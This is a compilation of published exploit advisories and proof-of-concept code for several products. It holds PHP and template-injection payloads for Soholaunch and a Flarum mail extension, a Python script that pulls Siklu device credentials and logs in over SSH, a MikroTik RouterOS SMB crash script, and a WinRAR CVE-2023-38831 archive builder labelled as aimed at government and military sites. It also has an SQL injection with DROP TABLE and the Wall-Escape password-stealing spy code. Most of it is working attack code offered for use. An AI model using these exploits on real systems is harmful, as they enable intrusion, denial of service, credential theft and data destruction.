<pre><code>## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution<br />### Date: 2024-3-29<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://livesite.com/<br />### Version : v4.9.4 r44<br /><br /><br />1 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file<br /> <br />Payload : <?php echo system('id); ?><br /><br />2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.php<br /><br />Result: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local File<br />Inclusion (LFI)<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Local File<br />Inclusion (LFI) due to the unsafe handling of file paths in the email<br />template. An attacker with administrative access can exploit this<br />vulnerability to include sensitive files from the server's file system in<br />the email content, potentially leading to information disclosure.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br /><br />Navigate to the FoF Pretty Mail extension settings.<br /><br />Edit the email default template and insert the following payload at the end<br />of the template:<br /><br />{{ include('/etc/passwd') }}<br /><br />Save the changes to the email template.<br /><br />Trigger any action that sends an email, such as user registration or<br />password reset.<br /><br />The recipient of the email will see the contents of the included file (in<br />this case, /etc/passwd) in the email content.<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-Side<br />Template Injection (SSTI)<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side<br />Template Injection (SSTI) due to the unsafe handling of template variables.<br />An attacker with administrative access can inject malicious code into the<br />email template, leading to arbitrary code execution on the server.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br />Navigate to the FoF Pretty Mail extension settings.<br />Edit the email default template and insert the following payload:<br /><br /><br /><br />{{ 7*7 }}<br />{{ system('id') }}<br />{{ system('echo "Take The Rose"') }}<br /><br />Save the changes to the email template.<br />Trigger any action that sends an email, such as user registration or<br />password reset.<br />The recipient of the email will see the result of the injected expressions<br />(e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id')<br />}}, and the output of the echo "Take The Rose" command for {{ system('echo<br />"Take The Rose"') }}) in the email content.<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command Injection<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Command Injection<br />due to the unsafe handling of user input in the email template. An attacker<br />with administrative access can inject PHP code into the email template,<br />leading to arbitrary command execution on the server.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br />Navigate to the FoF Pretty Mail extension settings.<br />Edit the email default template and insert one of the following payloads at<br />the end of the template:<br /><br /><?php system('echo "Take The Rose"; id'); ?><br />or<br /><?php system('echo "Take The Rose"; cat /etc/passwd'); ?><br /><br />Save the changes to the email template.<br />Trigger any action that sends an email, such as user registration or<br />password reset.<br />The recipient of the email will see the message "Take The Rose" followed by<br />the output of the injected command (id or cat /etc/passwd) in the email<br />content.<br /></code></pre>
<pre><code># Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure<br /># Date: 28-02-2024<br /># Exploit Author: semaja2<br /># Vendor Homepage: https://siklu.com/<br /># Software Link: https://partners.siklu.com/home/frontdoor<br /># Version: < 2.0.0<br /># Tested on: 2.0.0<br /># CVE : None assigned<br />#<br /># Instructions<br /># 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device<br /># `ping6 -I en7 -c 2 ff02::1`<br /># 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address<br /># `ip -6 neigh show dev en7`<br /># 3. Execute script<br /># `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`<br /># 4. Enjoy the access<br /><br /><br /><br />import socket<br />import sys<br />import os<br /><br />address = str(sys.argv[1]) # the target<br />port = 12777<br /><br /># Captured command, sends "GetCredentials" to obtain random generated username/password<br />cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")<br /><br />addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)<br />(family, socktype, proto, canonname, sockaddr) = addrinfo[0]<br />s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)<br />s.connect(sockaddr)<br />s.send(cmd)<br />data = s.recv(200)<br />s.close()<br />output = "".join(map(chr, data))<br /><br /># Split output, then remove trailing noise as string length is always 35<br />splits = output.split('#')<br />username = splits[1][slice(0, 35, 1)]<br />password = splits[2][slice(0, 35, 1)]<br />print('Username: ', username)<br />print('Password: ', password)<br />os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS<br /># Google Dork: N/A<br /># Date: 03/04/2024<br /># Exploit Author: ice-wzl, Solstice Cyber Solutions<br /># Vendor Homepage: https://mikrotik.com/<br /># Software Link: https://mikrotik.com/download/archive<br /># Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10<br /># Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10<br /># CVE : CVE-2024-27686<br />#!/usr/bin/python3 <br /># Founded by ice-wzl in conjunction with Solstice Cyber Solutions<br />import argparse<br />import sys<br />import socket <br /># Define the packets<br /><br /># the packet that causes crash 6.40.5 - 6.42.3<br />fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00'<br /><br /><br />packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00'<br />packet_2_fuzzed = b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f'<br /><br /><br />def open_connection(ip, port):<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> try:<br /> s.connect((ip, port))<br /> return s<br /> except ConnectionRefusedError:<br /> print(f"[!] Connection Refused on: {ip} {port}")<br /> sys.exit(2)<br /><br />def send_payload_high(s):<br /> s.send(packet_0)<br /> s.send(packet_2_fuzzed)<br /> s.close()<br /><br />def send_payload_low(s):<br /> s.send(fuzzed_packet_6)<br /> s.close()<br /><br />def verify_input(user_inp):<br /> try:<br /> user_inp = int(user_inp)<br /> if user_inp > 2 or user_inp < 1:<br /> return 3<br /> else:<br /> return user_inp<br /> except ValueError:<br /> return 0<br /><br />if __name__ == '__main__':<br /><br /> parser = argparse.ArgumentParser(prog='SMB Crash',<br /> description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',<br /> epilog='Discovered by: ice-wzl')<br /><br /> parser.add_argument("-t", "--target", action="store", dest="target")<br /> parser.add_argument("-p", "--port", action="store", dest="port")<br /><br /> args = parser.parse_args()<br /> <br /> if not args.target or not args.port:<br /> print(f"[+] python3 {sys.argv[0]} --help")<br /> sys.exit(1)<br /><br /> print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:")<br /> version_choice = input("--> ")<br /><br /> if verify_input(version_choice) == 0:<br /> print("Please enter a number...")<br /> sys.exit(3)<br /> elif verify_input(version_choice) == 3:<br /> print("Please enter a number between 1 and 2")<br /> sys.exit(4)<br /><br /> if verify_input(version_choice) == 1:<br /> if args.port:<br /> get_connect = open_connection(args.target, int(args.port))<br /> send_payload_low(get_connect)<br /> print(f"[+] Sent DOS to {args.target} on {args.port}")<br /> else:<br /> get_connect = open_connection(args.target, 445)<br /> send_payload_low(get_connect)<br /> print(f"[+] Sent DOS to {args.target} on 445") <br /> <br /> if verify_input(version_choice) == 2:<br /> if args.port:<br /> get_connect = open_connection(args.target, int(args.port))<br /> send_payload_high(get_connect)<br /> print(f"[+] Sent DOS to {args.target} on {args.port}")<br /><br /> else:<br /> get_connect = open_connection(args.target, 445)<br /> send_payload_high(get_connect)<br /> print(f"[+] Sent DOS to {args.target} on 445")<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: Broken Access Control - on NodeBB v3.6.7<br /><br />Date: 22/2/2024<br /><br />Exploit Author: Vibhor Sharma<br /><br />Vendor Homepage: https://nodebb.org/<br /><br />Version: 3.6.7<br /><br />Description:<br /><br />I identified a broken access control vulnerability in nodeBB v3.6.7,<br />enabling attackers to access restricted information intended solely<br />for administrators. Specifically, this data is accessible only to<br />admins and not regular users. Through testing, I discovered that when<br />a user accesses the group section of the application and intercepts<br />the response for the corresponding request, certain attributes are<br />provided in the JSON response. By manipulating these attributes, a<br />user can gain access to tabs restricted to administrators. Upon<br />reporting this issue, it was duly acknowledged and promptly resolved<br />by the developers.<br /><br /><br /><br />Steps To Reproduce:<br />1) User with the least previlages needs to neviagte to the group section.<br />2) Intercept the response for the group requets.<br />3) In the response modify the certian paramters : "<br />*"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,<br />**" *".<br />4) Forward the request and we can see that attacker can access the<br />restricted information.<br /><br />*Impact:*<br />Attacker was able to access the restricted tabs for the Admin group<br />which are only allowed the the administrators.<br /> <br /><br /></code></pre>
<pre><code>################################################################################################<br /># Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #<br /># #<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Security Risk : High #<br /># #<br /># Description : All target's GOV & Military websites #<br /># #<br />################################################################################################<br /># #<br /># Expl0iTs: #<br /> <br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include "zip.h"<br />#define PDF_FILE "document.pdf"<br />#define FOLDER_NAME "document.pdf\\"<br />#define SCRIPT_FILE "script.bat"<br />#define ZIP_FILE "exploit.zip"<br /> <br />int main(void) {<br /> zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);<br /> if (zf == NULL) {<br /> printf("Error opening ZIP file\n");<br /> return -1;<br /> }<br /> zip_fileinfo zfi;<br /> memset(&zfi, 0, sizeof(zfi));<br /> if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br /> printf("Error adding PDF file to ZIP file\n");<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> FILE *fp = fopen(PDF_FILE, "rb");<br /> if (fp == NULL) {<br /> printf("Error opening PDF file\n");<br /> zipCloseFileInZip(zf);<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> char buffer[1024];<br /> int bytes_read;<br /> while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {<br /> if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {<br /> printf("Error writing PDF file to ZIP file\n");<br /> fclose(fp);<br /> zipCloseFileInZip(zf);<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> }<br /> fclose(fp);<br /> zipCloseFileInZip(zf);<br /> if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br /> printf("Error adding folder to ZIP file\n");<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> zipCloseFileInZip(zf);<br /> char script_name[256];<br /> sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);<br /> if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br /> printf("Error adding script file to ZIP file\n");<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";<br /> if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {<br /> printf("Error writing script file to ZIP file\n");<br /> zipCloseFileInZip(zf);<br /> zipClose(zf, NULL);<br /> return -1;<br /> }<br /> zipCloseFileInZip(zf);<br /> <br /> zipClose(zf, NULL);<br /> <br /> printf("ZIP file created successfully\n");<br /> return 0;<br />}<br /><br />https://nvd.nist.gov/vuln/detail/CVE-2023-38831<br />https://nvd.nist.gov/vuln/detail/CVE-2023-38831<br />https://github.com/HDCE-inc/CVE-2023-38831<br />https://www.cvedetails.com/cve/CVE-2023-38831/<br />https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831<br />http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html<br />https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/<br />https://news.ycombinator.com/item?id=37236100<br />https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/<br />https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/<br />https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Event Management - SQL Injection<br /># Application: Event Management<br /># Date: 19.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://github.com/PuneethReddyHC<br /># Software Link: https://github.com/PuneethReddyHC/event-management<br /># Version:1.0<br /># Attack Type: Remote<br /># Tested on: Windows 10 64 bit Wampserver <br /><br /><br /># About project:<br /><br />helps to register an users for on events conducted in college fests with simple logic with secured way<br /><br /><br /><br />## Vulnerability Details:<br /><br />- **Application Name**: Event Management<br />- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)<br />- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)<br /><br /><br /><br /># Vulnerable code section:<br /><br /># https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64<br /><br /><?php<br /><br /><br />// ... (other code)<br /><br />if(empty($full_name) || empty($email) || empty($mobile)) {<br /> // Error messages and actions for incomplete data<br />} else {<br /> if(!preg_match($name,$full_name)){<br /> // Error messages and actions for invalid full name<br /> }<br /><br /> // Additional regex checks for email and mobile format<br /><br /> // Verifying mobile number length<br /> if(!(strlen($mobile) == 10)){<br /> // Error message and action for invalid mobile number length<br /> }<br /><br /> // Database insertion operation<br /> $sql = "INSERT INTO `participants` <br /> (`p_id`,`event_id`, `fullname`, `email`, <br /> `mobile`, `college`, `branch`) <br /> VALUES (NULL,'$event_id', '$full_name', '$email', <br /> '$mobile', '$college', '$branch')";<br /> <br /> if(mysqli_query($con,$sql)){<br /> // Successful registration message<br /> echo "register_success";<br /> echo "<script> location.href='index.php'; </script>";<br /> exit;<br /> }<br />}<br /><br />// ... (other code)<br />?><br /><br /><br /><br /># Vulnerability Description:<br /><br />The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, making it susceptible to various forms of attacks such as cross-site scripting (XSS) and potential security risks.<br /><br /><br /><br /># Proof of Concept (PoC):<br /><br />SQL Injection:<br /><br />The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is directly used in the SQL query without proper validation or parameterization:<br /><br />An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.<br /><br />PoC:<br /><br /><br />POST /event-management-master/backend/register.php HTTP/1.1<br />Host: localhost<br /><br />event_id=1'; DROP TABLE participants; --<br /><br />This could result in a SQL query like:<br /><br />INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`, `college`, `branch`) <br />VALUES (NULL,'1'; DROP TABLE participants; --', 'test', 'test@gmail.com', '0555555555', 'asd', 'qwe')<br /><br />To mitigate this, use prepared statements or parameterized queries to ensure proper sanitization of user inputs.<br /><br /><br /><br /></code></pre>
<pre><code>Wall-Escape (CVE-2024-28085)<br /><br />Skyler Ferrante: Escape sequence injection in util-linux wall<br /><br />=================================================================<br />Summary<br />=================================================================<br /><br />The util-linux wall command does not filter escape sequences from<br />command line arguments. The vulnerable code was introduced in<br />commit cdd3cc7fa4 (2013). Every version since has been<br />vulnerable.<br /><br />This allows unprivileged users to put arbitrary text on other<br />users terminals, if mesg is set to y and wall is setgid. CentOS<br />is not vulnerable since wall is not setgid. On Ubuntu 22.04 and<br />Debian Bookworm, wall is both setgid and mesg is set to y by<br />default.<br /><br />If a system runs a command when commands are not found, with the<br />unknown command as an argument, the unknown command will be<br />leaked. This is true of Ubuntu 22.04. Debian Bookworm does not<br />leak unknown commands in its starting configuration.<br /><br />On Ubuntu 22.04, we have enough control to leak a users password<br />by default. The only indication of attack to the user will be an<br />incorrect password prompt when they correctly type their<br />password, along with their password being in their command<br />history.<br /><br />On other systems that allow wall messages to be sent, an attacker<br />may be able to alter the clipboard of a victim. This works on<br />windows-terminal, but not on gnome-terminal.<br /><br />=================================================================<br />Analysis<br />=================================================================<br /><br />When displaying inputs from stdin, wall uses the function<br />fputs_careful in order to neutralize escape characters.<br /><br />Unfortunately, wall does not do the same for input coming from<br />argv.<br /><br />term-utils/wall.c (note that mvec is argv)<br />```<br />/*<br />* Read message from argv[]<br />*/<br />int i;<br /><br />for (i = 0; i < mvecsz; i++) {<br /> fputs(mvec[i], fs);<br /> if (i < mvecsz - 1)<br /> fputc(' ', fs);<br />}<br />fputs("\r\n", fs);<br />...<br /><br />/*<br /> * Read message from stdin.<br /> */<br />while (getline(&lbuf, &lbuflen, stdin) >= 0)<br /> fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);<br />```<br /><br />Since argv is attacker controlled, and can contain binary data,<br />this is exploitable. A simple PoC command:<br /><br /> wall $(printf "\033[33mHI")<br /><br />If you are vulnerable, this should show a broadcast with "HI"<br />being yellow. If we instead run:<br /><br /> echo $(printf "\033[33mHI") | wall<br /><br />This should fail with "^[[33m" showing up before our message.<br /><br />To make sure the PoC will work, make sure your victim user can<br />actually receive messages. First check that mesg is set to y<br />(`mesg y`). If a user does not have mesg turned on, they are not<br />exploitable.<br /><br />If you still can't receive messages, try running `su user` or<br />accessing the machine through SSH. Note that just because you<br />can't receive messages without first going through su/SSH, does<br />not mean a user is not vulnerable.<br />=================================================================<br />Exploitation<br />=================================================================<br /><br />Most distros allow argument data to be seen by unprivileged<br />users, and some distros run commands when commands are not found.<br />We can use this to leak a users password by tricking them into<br />giving their password as a command to run.<br /><br />When I run the command xsnow in my terminal, I get the following<br />output:<br />```<br />Command 'xsnow' not found, but can be installed with:<br />sudo apt install xsnow<br />```<br /><br />Lets look at what new processes are created when I do this:<br />```<br />-bash<br />/usr/bin/python3 /usr/lib/command-not-found -- xsnow<br />/usr/bin/snap advise-snap --format=json --command xsnow<br />```<br /><br />This is on Ubuntu, but similar commands exist on other systems.<br /><br />As a simple demonstration let's create a fake sudo prompt for<br />gnome-terminal, and then spy on /proc/$pid/cmdline.<br /><br />fake sudo prompt:<br />```<br />#include<stdio.h><br />#include<unistd.h><br /><br />int main(){<br /> char* argv[] = {"prog",<br /> "\033[3A" // Move up 3<br /> "\033[K" // Delete prompt<br /> "[sudo] password for a_user:"<br /> "\033[?25l"<br /> // Set forground RGB (48,10,36)<br /> // hide typing<br /> "\033[38;2;48;10;36m",<br /> NULL};<br /><br /> char* envp[] = {NULL};<br /><br /> execve("/usr/bin/wall", argv, envp);<br />}<br />```<br /><br />cmdline spy:<br />```<br />#include<stdio.h><br />#include<sys/types.h><br />#include<sys/stat.h><br />#include<fcntl.h><br />#include<unistd.h><br />#include<ctype.h><br />#include<stdlib.h><br />#include<dirent.h><br />#include<time.h><br /><br />#define USLEEP_TIME 2000<br /><br />int main(){<br /> pid_t current_max_pid = 0, next_max_pid;<br /> char current_file_name[BUFSIZ];<br /> char buf[BUFSIZ];<br /><br /> DIR* proc_dir;<br /> struct dirent *dir_e;<br /> int curr_e_fp;<br /><br /> while(1){<br /> proc_dir = opendir("/proc");<br /> if(!proc_dir)<br /> abort();<br /><br /> usleep(USLEEP_TIME);<br /> while((dir_e = readdir(proc_dir)) != NULL){<br /> char* d_name = dir_e->d_name;<br /><br /> // If not a digit (not a process folder)<br /> if(!isdigit(*d_name))<br /> continue;<br /><br /> int num = atoi(d_name);<br /><br /> if(num > current_max_pid){<br /> next_max_pid = num;<br /> }else{<br /> continue;<br /> }<br /><br /> snprintf(current_file_name,<br />sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");<br /> curr_e_fp = open(current_file_name, O_RDONLY);<br /> int ra = read(curr_e_fp, buf, BUFSIZ-1);<br /> close(curr_e_fp);<br /><br /> for(int i = 0; i<ra-1; i++)<br /> if(buf[i] == '\0') buf[i] = ' ';<br /><br /> // guaranteed to be in-bounds<br /> buf[ra-1] = '\n';<br /><br /> write(1, buf, ra);<br /> }<br /> current_max_pid = next_max_pid;<br /> closedir(proc_dir);<br /> }<br />}<br />```<br /><br />If we run the cmdline spy and the sudo password prompt, the user<br />may input their password as a command. It will look like the<br />following on Ubuntu:<br /><br />```<br />-bash<br />/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!<br />/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!<br />```<br /><br />Some distros, like Debian, do not seem to have a command like<br />command-not-found by default. There does not seem to be a way to<br />leak a users password in this case then, even though we can send<br />escape sequences to them.<br /><br />This works, but the user has no reason to expect a password page<br />at this point. Now that we have shown some exploitability, lets<br />try and make it better.<br /><br />Imagine we run the cmdline spy in one terminal, and then in<br />another terminal we run `sudo systemctl status cron.service`.<br />The spy will see the sudo process first, and then after the user<br />types their password correctly they will see `systemctl status<br />cron.service`.<br /><br />```<br />sudo systemctl status cron.service<br />systemctl status cron.service<br />```<br /><br />An attacker could inject a password incorrect message as soon as<br />the second process starts (password correct). The user will<br />assume they typed their password incorrectly and enter it again.<br /><br />watch for certain command<br />```<br />#include<stdio.h><br />#include<sys/types.h><br />#include<sys/stat.h><br />#include<fcntl.h><br />#include<unistd.h><br />#include<ctype.h><br />#include<stdlib.h><br />#include<dirent.h><br />#include<time.h><br />#include<string.h><br /><br />#define USLEEP_TIME 3000<br /><br />int main(int argc, char** argv){<br /> pid_t current_max_pid = 0, next_max_pid;<br /> char current_file_name[BUFSIZ];<br /> char buf[BUFSIZ];<br /><br /> DIR* proc_dir;<br /> struct dirent *dir_e;<br /> int curr_e_fp;<br /><br /> if(argc != 2){<br /> printf("Usage: prog search_string\n");<br /> return 1;<br /> }<br /><br /> while(1){<br /> proc_dir = opendir("/proc");<br /> if(!proc_dir)<br /> abort();<br /> usleep(USLEEP_TIME);<br /> while((dir_e = readdir(proc_dir)) != NULL){<br /> char* d_name = dir_e->d_name;<br /><br /> // If not a digit (not a process folder)<br /> if(!isdigit(*d_name))<br /> continue;<br /><br /> snprintf(current_file_name,<br />sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");<br /> curr_e_fp = open(current_file_name, O_RDONLY);<br /> int ra = read(curr_e_fp, buf, BUFSIZ-1);<br /> close(curr_e_fp);<br /><br /> for(int i = 0; i<ra-1; i++)<br /> if(buf[i] == '\0') buf[i] = ' ';<br /><br /> // guaranteed to be in-bounds<br /> buf[ra-1] = '\0';<br /><br /> // Check if proces is us<br /> if(strstr(buf, argv[0])){<br /> continue;<br /> }<br /> // Check against search string<br /> if(!strcmp(buf, argv[1])){<br /> write(1, buf, ra);<br /> write(1, "\n", 1);<br /> return 0;<br /> }<br /> }<br /> closedir(proc_dir);<br /> }<br />}<br />```<br /><br />Imagine our new spy code was compiled as watch, and our wall<br />exploit was called throw.<br /><br />We can now run:<br />```<br />./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";<br />sleep .1; ./throw<br />```<br /><br />The first two commands will wait until the user runs<br /><br /> sudo systemctl start sshd<br /><br />and correctly types their password for sudo. Then our wall<br />exploit sends our fake sudo prompt. We need to sleep for a short<br />duration to make sure we cover up the command prompt.<br /><br />During this process, we need to make sure our original spy code<br />is logging all cmdline arguments, to recover the victims password<br /><br />Example log from original spy:<br />```<br />./watch sudo systemctl start sshd<br />sudo systemctl start sshd<br />./watch systemctl start sshd<br />systemctl start sshd<br />bash<br />./throw<br />bash<br />/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword<br />/usr/bin/snap advise-snap --format=json --command SuperStrongPassword<br />```<br /><br />Now lets imagine a different style of attack. An attacker can<br />change a users clipboard through escape sequences on some<br />terminals. For example, windows-terminal supports this. Gnome<br />terminal does not.<br /><br />```<br />#include<stdio.h><br /><br />int main(){<br /> printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");<br />}<br />```<br /><br />Since we can send escape sequences through wall, if a user is<br />using a terminal that supports this escape sequence, an attacker<br />can change the victims clipboard to arbitrary text.<br /><br />Further references:<br /> https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt<br /> https://github.com/skyler-ferrante/CVE-2024-28085<br /><br /></code></pre>